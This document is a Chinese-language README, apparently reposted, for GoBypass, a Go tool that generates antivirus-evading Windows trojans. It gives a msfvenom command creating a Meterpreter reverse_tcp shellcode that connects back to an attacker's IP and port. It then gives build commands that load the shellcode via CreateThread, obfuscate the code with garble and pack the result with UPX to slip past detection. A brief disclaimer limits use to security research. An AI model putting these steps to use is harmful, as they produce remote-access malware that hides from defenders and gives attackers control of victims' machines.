GoBypass - Golang免杀生成工具

Golang免杀生成工具，参考网上已有的免杀方式实现的半自动免杀马生成工具，需要本地安装Golang环境，支持多种参数与方式生成。

项目地址：

https://github.com/4ra1n/GoBypass

0x01 免责声明

该工具仅用于安全研究，禁止使用工具发起非法攻击等违法行为，造成的后果使用者负责。

0x02 介绍

Golang免杀马生成工具（该工具仅针对Windows系统），不确定免杀效果如何，核心部分借鉴大佬的代码然后自己造轮子。

使用参考视频：

https://www.bilibili.com/video/BV1iu411d7QB

0x03 准备工作

在kali中使用msfvenom生成需要的payload（注意使用-f c参数），示例：

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c

复制完整C语言格式的shellcode并写入当前目录的shellcode.txt（无需过多处理，内部会对ShellCode进行编码）

0x04 生成免杀马

在生成免杀马之前请注意以下三件事：

确保安装Golang且环境变量中包含go，否则无法编译请在当前目录先执行go env -w GO111MODULE=on，然后go mod download命令下载依赖如果下载依赖过慢，配置镜像go env -w GOPROXY=https://mirrors.aliyun.com/goproxy

一切就绪后就可以开始生成了，示例：

使用CreateThread模块并删除编译信息：go run main.go -m CreateThread -d
删除编译信息且用garble混淆源码后编译：go run main.go -m CreateThread -d -g
编译后的可执行文件进行upx加壳：go run main.go -m CreateThread -d -g -u

可选参数如下：

其中必须的模块参数如下：

0x05 参考

尤其感谢Safe6Sec师傅的项目

• https://github.com/safe6Sec/GolangBypassAV

• https://github.com/Ne0nd0g/go-shellcod

---